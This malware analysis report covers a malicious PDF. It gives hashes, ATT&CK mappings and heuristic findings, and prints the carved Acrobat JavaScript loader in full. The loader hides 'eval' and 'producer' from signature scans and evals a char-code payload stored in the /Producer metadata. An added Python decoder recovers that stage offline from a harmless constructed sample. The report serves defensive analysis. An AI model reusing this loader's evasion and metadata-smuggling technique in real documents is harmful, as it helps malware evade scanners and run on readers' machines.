Malicious PDF — malware analysis report

Static analysis result for SHA-256 e134b7990ba8851f…

MALICIOUS

PDF

Size: 22.1 KB | Created: 2010-07-25 10:32:51 | First seen: 2026-05-09
MD5: aa73a9f235c26d9d7b56744badbddd0f SHA-1: cbcadbcac49268aad48c74f926adcc0722c069f6 SHA-256: e134b7990ba8851fee633f50ccc769b6f6ae667a6bf0e88f71699775c01d9ce8
Risk Score: 116

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1204.002 Malicious File
(No PowerShell content was observed in this sample; the only script content is Acrobat JavaScript, so T1059.001 PowerShell does not apply.)

The ML classifier strongly indicates this PDF is malicious. Static analysis detected embedded JavaScript that assembles its sensitive identifiers at runtime: the names 'eval' and 'producer' are built from string fragments plus a digit taken from a fixed date (new Date(2010,11,4).getDay() returns 6 for Saturday, 4 December 2010) and then patched with replace(). The script resolves eval through the app object, evaluates 'var uqfm=this' to obtain the Doc object, reads this.producer (the /Producer string from the document Info dictionary), wraps it in String.fromCharCode inside an eval, and evals the decoded result. The JavaScript stream 'javascript_obj0001_000.js' is therefore only a loader: the second stage is expected to sit in the /Producer metadata entry as a comma-separated list of character codes, not in the JS stream, so analysis of the carved script alone will not reveal the payload. Recover the /Producer value from the Info dictionary and decode it before drawing conclusions about what the second stage does. The primary attack pattern involves luring the user into opening the PDF (T1204.002) so that the embedded script executes inside the reader.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (4)

  • JavaScript action (low, 2 related findings) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script:
    bbbu(bbbu('String.fromCharCode(' + wga + ')'));
  • Embedded JS stream (low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0001_000.js | pdf-javascript-stream | PDF /JS object 1 at offset 0x5617 | 376 bytes
SHA-256: f0981da6c03e635f8a1cb0f7d39e03c15dea749f4ee02bf70f31b3272233d829
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). The only literal decoder reference is the String.fromCharCode text inside the string handed to eval; the eval and producer lookups themselves are assembled from fragments at runtime and are invisible to plain token matching, which also explains the ClamAV miss on a 376-byte loader that carries no payload of its own.
Preview script
Extracted script (12 lines, shown in full)
xuxw = app;                                              // alias the Acrobat app object
mydzq = new Date(2010,11,4);                             // 4 Dec 2010 (JS months are 0-based); getDay() returns 6 (Saturday)
var dams='';                                             // empty string spliced into literals to break up signature strings
var rvig = 'e'+mydzq.getDay()+'a'+dams+'l';              // 'e6al'
rvig = rvig.replace('6','v');                            // 'eval'
bbbu=xuxw[rvig];                                         // bbbu = app['eval']
var dams='';
bbbu('va'+dams+'r uqfm=th'+dams+'i'+dams+'s');          // eval('var uqfm=this'): uqfm is the Doc object
iyeo='pr' + dams + mydzq.getDay() + dams + 'uc' +'er';   // 'pr6ucer'
iyeo = iyeo.replace('6', 'od');                          // 'producer'
var wga = uqfm[iyeo];                                    // this.producer: the /Producer string from the PDF Info dictionary
bbbu(bbbu('String.fromCharCode(' + wga + ')'));         // decode the char-code list in /Producer, then eval the result
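The loader above hides its second stage in document metadata, so the analyst's next step is to pull /Producer out of the Info dictionary and replay String.fromCharCode over it offline. The following Python is an added example written for this report, not part of the analysis platform or the sample: it replays the name-building trick to confirm the resolved identifiers, extracts a PDF string object (literal or hex form, with escapes) for a given Info key, and decodes the char-code list. SAMPLE_PDF is a constructed fragment, not the analysed file and not a complete PDF; its /Producer value decodes to a harmless app.alert call standing in for the real second stage.

```python
import re
from datetime import date

# Constructed fragment (not the analysed sample, not a parseable PDF): an Info
# dictionary whose /Producer carries the second stage as comma-separated char
# codes, the way the carved loader expects (eval(String.fromCharCode(<producer>))).
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /OpenAction << /S /JavaScript /JS 4 0 R >> >> endobj\n"
    b"4 0 obj << /Length 46 >> stream\n"
    b"bbbu(bbbu('String.fromCharCode(' + wga + ')'));\n"
    b"endstream endobj\n"
    b"5 0 obj << /Creator (x) "
    b"/Producer (97,112,112,46,97,108,101,114,116,40,34,104,105,34,41) >> endobj\n"
    b"trailer << /Root 1 0 R /Info 5 0 R >>\n"
)


def js_get_day(year, js_month, day):
    """Reproduce JavaScript's new Date(y, m, d).getDay(): months 0-based, Sunday = 0."""
    return (date(year, js_month + 1, day).weekday() + 1) % 7


def resolve_obfuscated_names(year=2010, js_month=11, day=4):
    """Replay the string building in the carved loader to recover the names it hides."""
    digit = str(js_get_day(year, js_month, day))          # '6' for 4 Dec 2010
    rvig = ("e" + digit + "al").replace("6", "v")          # -> 'eval'
    iyeo = ("pr" + digit + "uc" + "er").replace("6", "od")  # -> 'producer'
    return rvig, iyeo


def _unescape_literal(raw):
    """Undo PDF literal-string escapes: \\n \\r \\t \\b \\f, \\( \\) \\\\ and octal \\ddd."""
    simple = {ord("n"): 10, ord("r"): 13, ord("t"): 9, ord("b"): 8, ord("f"): 12}
    out, i = bytearray(), 0
    while i < len(raw):
        c = raw[i]
        if c == 0x5C and i + 1 < len(raw):
            j, digits = i + 1, b""
            while j < len(raw) and len(digits) < 3 and 0x30 <= raw[j] <= 0x37:
                digits += bytes([raw[j]])
                j += 1
            if digits:                      # octal escape
                out.append(int(digits, 8) & 0xFF)
                i = j
            else:                           # single-character escape
                out.append(simple.get(raw[i + 1], raw[i + 1]))
                i += 2
            continue
        out.append(c)
        i += 1
    return bytes(out)


def read_pdf_string(data, pos):
    """Decode the PDF string object (literal (...) or hex <...>) starting at data[pos]."""
    if data[pos:pos + 1] == b"(":
        depth, i = 0, pos
        while i < len(data):
            c = data[i:i + 1]
            if c == b"\\":
                i += 2                      # skip the escaped byte
                continue
            if c == b"(":
                depth += 1
            elif c == b")":
                depth -= 1
                if depth == 0:
                    return _unescape_literal(data[pos + 1:i])
            i += 1
        raise ValueError("unterminated literal string")
    if data[pos:pos + 1] == b"<":
        end = data.index(b">", pos)
        hexdigits = re.sub(rb"\s+", b"", data[pos + 1:end])
        if len(hexdigits) % 2:
            hexdigits += b"0"               # PDF pads a trailing odd digit with 0
        return bytes.fromhex(hexdigits.decode("ascii"))
    raise ValueError("not a PDF string object")


def find_info_value(pdf, key):
    """Return the string value of /key (first occurrence in the file), or None."""
    m = re.search(rb"/" + re.escape(key) + rb"\s*", pdf)
    return None if m is None else read_pdf_string(pdf, m.end())


def decode_fromcharcode(arg):
    """Emulate String.fromCharCode() over a comma-separated list of code units.
    A non-numeric token means /Producer is not the carrier in this variant."""
    codes = [int(tok) for tok in arg.split(",") if tok.strip()]
    return "".join(chr(c & 0xFFFF) for c in codes)


def recover_second_stage(pdf):
    """Do offline what the loader does in the reader: decode this.producer."""
    raw = find_info_value(pdf, b"Producer")
    if raw is None:
        raise ValueError("no /Producer entry found")
    return decode_fromcharcode(raw.decode("latin-1"))


if __name__ == "__main__":
    print(resolve_obfuscated_names())          # ('eval', 'producer')
    print(recover_second_stage(SAMPLE_PDF))     # decoded second stage
```

On the real sample, feed the whole file to recover_second_stage; if the Info dictionary is inside an object stream or the /Producer is only present in XMP metadata, decompress or extract that first, since this scanner only looks at the raw bytes.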